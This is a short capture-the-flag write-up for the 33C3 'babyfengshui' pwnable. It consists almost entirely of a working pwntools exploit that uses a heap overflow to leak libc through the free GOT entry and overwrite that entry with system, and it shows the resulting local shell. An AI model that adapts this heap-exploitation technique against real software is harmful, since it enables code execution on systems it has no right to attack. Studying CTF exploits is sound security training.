33C3 CTF - babyfengshui

Category : pwnable

Summary : heap overflow

Exploit

#!/usr/bin/python

from pwn import *

def cmd_add(alloc_size, input_size, name, data):
   ru('Action')
   sl(str(0))
   ru('size of description: ')
   sl(str(alloc_size))
   ru('name: ')
   sl(name)
   ru('text length: ')
   sl(str(input_size))
   ru('text: ')
   sl(data)

def cmd_del(idx):
   ru('Action')
   sl(str(1))
   ru('index: ')
   sl(str(idx))


def cmd_show(idx):
   ru('Action')
   sl(str(2))
   ru('index: ')
   sl(str(idx))
   ru('name: ')
   name = rl(False)
   ru('description: ')
   desc = rl(False)
   return name, desc


def cmd_update(idx, input_size, data):
   ru('Action')
   sl(str(3))
   ru('index: ')
   sl(str(idx))
   ru('text length: ')
   sl(str(input_size))
   ru('text: ')
   sl(data)

free_got = 0x0804b010

s = process('./babyfengshui')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

cmd_add(0x20, 0x20, 'name', 'desc')
cmd_add(0x10, 0x10, 'overwriteme', 'desc2')
cmd_add(0x20, 0x20, 'name3', 'desc3')
cmd_add(0x100, 0x100, 'name4', 'sh')
cmd_del(0)
cmd_del(2)

pay = ''
pay += 'a' * 0x80
pay += p32(0) + p32(0x19)
pay += 'a' * 0x10
pay += p32(0) + p32(0x89)
pay += p32(free_got)
pay += 'overwriteok'

cmd_add(0x80, len(pay), 'name', pay)
_, leak = cmd_show(1)
libc_base = u32(leak[0:4]) - 0x70750
libc_system = libc_base + 0x3a940

cmd_update(1, 4, p32(libc_system))
cmd_del(3)

s.interactive()
s.close()

$ python ex.py 
[+] Starting local process './babyfengshui': pid 128654
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)